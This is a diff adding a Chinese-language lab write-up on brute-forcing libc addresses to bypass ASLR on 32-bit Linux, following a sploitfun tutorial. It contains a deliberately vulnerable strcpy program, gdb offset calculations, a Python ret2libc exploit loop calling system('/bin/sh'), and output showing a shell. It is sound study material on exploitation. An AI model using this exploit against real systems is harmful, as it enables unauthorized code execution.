|
| 1 | +# 0x00 beginning |
| 2 | + |
| 3 | +记录学暴力破解 32 位 Linux bypass ASLR 的过程, 实验部分来自`sploitfun`[^origin]. |
| 4 | + |
| 5 | +>What is brute-force? |
| 6 | +
|
| 7 | +在这个技术中攻击者随意选择一个`libc`的基地址来持续攻击直到成功, 这个技术是最简单`bypass`的 ASLR 的方法, 当然需要一定运气. |
| 8 | + |
| 9 | +演示代码如下: |
| 10 | + |
| 11 | +```shell |
| 12 | +// gcc -fno-stack-protector |
| 13 | +// echo 2 > /proc/sys/kernel/randomize_va_space |
| 14 | + |
| 15 | +#include <stdio.h> |
| 16 | +#include <string.h> |
| 17 | + |
| 18 | +int main(int argc, char* argv[]) { |
| 19 | + char buf[256]; |
| 20 | + strcpy(buf,argv[1]); |
| 21 | + printf("%s\n",buf); |
| 22 | + fflush(stdout); |
| 23 | + return 0; |
| 24 | +} |
| 25 | +``` |
| 26 | + |
| 27 | +# 0x01 analysis |
| 28 | + |
| 29 | +当地址随机化开启时候, 发现可以 libc 的每次加载地址都不一样, 但是有规律可循. |
| 30 | + |
| 31 | +```shell |
| 32 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 33 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7580000) |
| 34 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 35 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c5000) |
| 36 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 37 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7612000) |
| 38 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 39 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb753d000) |
| 40 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 41 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7563000) |
| 42 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 43 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000) |
| 44 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 45 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757d000) |
| 46 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 47 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c7000) |
| 48 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 49 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7564000) |
| 50 | +Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc |
| 51 | + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000) |
| 52 | +``` |
| 53 | + |
| 54 | +`libc`随机化只变化 0xb75 后面的两个数字, 因此最大尝试次数 256(2^8) 次时某次随机化的地址总可能又一次被用到, 在下面的`exp`选择`libc`的起始基地址`0xb7595000`进行多次尝试. |
| 55 | + |
| 56 | +# 0x02 how to use? |
| 57 | + |
| 58 | +exp 中 offset 的偏移还是用 peda 套路! offset 是 268. |
| 59 | + |
| 60 | +其中`system_arg`我是利用`libc`中"/bin/sh"相对于`system()`在 libc 中的偏移计算的, 利用 gdb`print`两个然后减法运算就可以, 具体操作如下 |
| 61 | + |
| 62 | +```shell |
| 63 | +gdb-peda$ p system |
| 64 | +$1 = {<text variable, no debug info>} 0xb7e63190 <__libc_system> |
| 65 | +gdb-peda$ searchmem "bin/sh" libc |
| 66 | +Searching for 'bin/sh' in: libc ranges |
| 67 | +Found 1 results, display max 1 items: |
| 68 | +libc : 0xb7f83a25 ("bin/sh") |
| 69 | +gdb-peda$ ^Z |
| 70 | +[1]+ Stopped gdb -q aslr_2 |
| 71 | +Sn0rt@warzone:~/lab$ python |
| 72 | +Python 2.7.6 (default, Mar 22 2014, 22:59:38) |
| 73 | +[GCC 4.8.2] on linux2 |
| 74 | +Type "help", "copyright", "credits" or "license" for more information. |
| 75 | +>>> hex(0xb7f83a25-0xb7e63190) |
| 76 | +'0x120895L' |
| 77 | +>>> |
| 78 | +``` |
| 79 | + |
| 80 | +参数填充 exp: |
| 81 | + |
| 82 | +```python |
| 83 | +#!/usr/bin/env python |
| 84 | + |
| 85 | +from subprocess import call |
| 86 | +from pwn import p32 |
| 87 | + |
| 88 | +libc_base_addr = 0xb7595000 |
| 89 | +exit_offset = 0x000331e0 |
| 90 | +system_offset = 0x00040190 |
| 91 | + |
| 92 | +system_addr = libc_base_addr + system_offset |
| 93 | +exit_addr = libc_base_addr + exit_offset |
| 94 | + |
| 95 | +system_arg = system_addr + 0x00120894 |
| 96 | + |
| 97 | +payload = "A" * 268 + p32(system_addr) + p32(exit_addr) + p32(system_arg) |
| 98 | + |
| 99 | +i = 0 |
| 100 | +while (i < 256): |
| 101 | + print "Number of tries: %d" %i |
| 102 | + ret = call(["./aslr_2", payload]) |
| 103 | + i += 1 |
| 104 | +``` |
| 105 | +其实这里 exp 已经完成了, 不过如果成功过后有点扫尾工作需要做, 把尾部加上 |
| 106 | + |
| 107 | +```python |
| 108 | + ret = call(["./aslr_2", payload]) |
| 109 | + i += 1 |
| 110 | + if (not ret): |
| 111 | + break |
| 112 | + else: |
| 113 | + print "Exploit failed" |
| 114 | +``` |
| 115 | + |
| 116 | +```shell |
| 117 | +... |
| 118 | +Number of tries: 79 |
| 119 | +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q]���\�$Zo� |
| 120 | +$ uid=1042(Sn0rt) gid=1043(Sn0rt) groups=1043(Sn0rt) |
| 121 | +$ |
| 122 | +``` |
| 123 | +需要多运行几次, 有时候会执行失败, 或者执行成功没有会显示. |
| 124 | + |
| 125 | +# 0x03 doubt |
| 126 | + |
| 127 | +这个技术利用了在同一个`libc`文件中函数偏移是相对的构造出 shellcode, 因此我填写的`libc`基地址又一次命中, 下面攻击就水到渠成, 按照理论这个脚本一次就可以命中`libc`, 为什么需要多次执行才能 get shell? |
| 128 | + |
| 129 | +### reference |
| 130 | + |
| 131 | +[^origin]: [sploitfun](https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-ii/) |
0 commit comments